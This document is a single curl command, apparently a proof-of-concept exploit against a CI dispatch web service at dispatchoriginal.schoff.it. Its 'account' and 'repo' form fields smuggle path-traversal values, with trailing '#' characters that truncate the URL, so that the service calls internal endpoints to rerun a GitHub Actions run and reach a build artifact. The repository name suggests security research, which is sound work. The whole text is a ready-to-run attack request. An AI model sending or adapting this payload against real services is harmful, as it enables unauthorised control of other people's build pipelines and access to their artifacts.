curl \
  -F "account=../../api/buildjobs/5q6s1wsid01at49x/artifacts/payload.json?stream=true#" \
  -F "project=a" \
  -F "buildid=0" \
  -F "base=a" \
  -F "hash=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
  -F "repo=../repos/STRUCTiX/libssh2-ethicalhacking/actions/runs/10239836102/rerun#" \
  -F "ssh_host=0000000" \
  -F "ssh_port=0000" \
  -F "ssh_user=a" \
  -F "ssh_forward=a" \
  -F "ssh_hostkey=a" \
  -F "ssh_privkey=a" \
  -s 'https://dispatchoriginal.schoff.it'
